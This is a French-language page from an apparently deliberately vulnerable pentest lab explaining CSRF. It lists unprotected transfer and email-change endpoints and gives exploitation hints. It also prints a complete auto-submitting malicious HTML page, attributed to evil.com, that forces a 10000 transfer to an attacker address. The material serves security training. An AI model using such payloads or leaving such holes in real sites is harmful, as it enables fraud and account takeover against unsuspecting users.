Pentest Lab - Failles de Securite

ATTENTION: Ces pages contiennent des vulnerabilites volontaires pour tests uniquement!

CSRF (Cross-Site Request Forgery)

Ces endpoints n'ont pas de protection CSRF. Un attaquant peut forcer un utilisateur a effectuer des actions.

Indices d'exploitation

  • Creer une page HTML malveillante avec un formulaire auto-soumis
  • Utiliser une balise <img> pour les requetes GET
  • Heberger la page et envoyer le lien a la victime

Transfert d'argent

Changer l'email

Exemple de page malveillante

Voici un exemple de code HTML qu'un attaquant pourrait utiliser:

<!-- Page malveillante hebergee sur evil.com --> <html> <body onload="document.getElementById('csrf-form').submit();"> <form id="csrf-form" action="https://cote-dev.fr/vulnerable/csrf/transfer" method="POST"> <input type="hidden" name="amount" value="10000"> <input type="hidden" name="to" value="hacker@evil.com"> </form> <p>Chargement...</p> </body> </html>

Endpoints vulnerables

Endpoint Methode Parametres
/vulnerable/csrf/transfer POST amount, to
/vulnerable/csrf/change-email POST email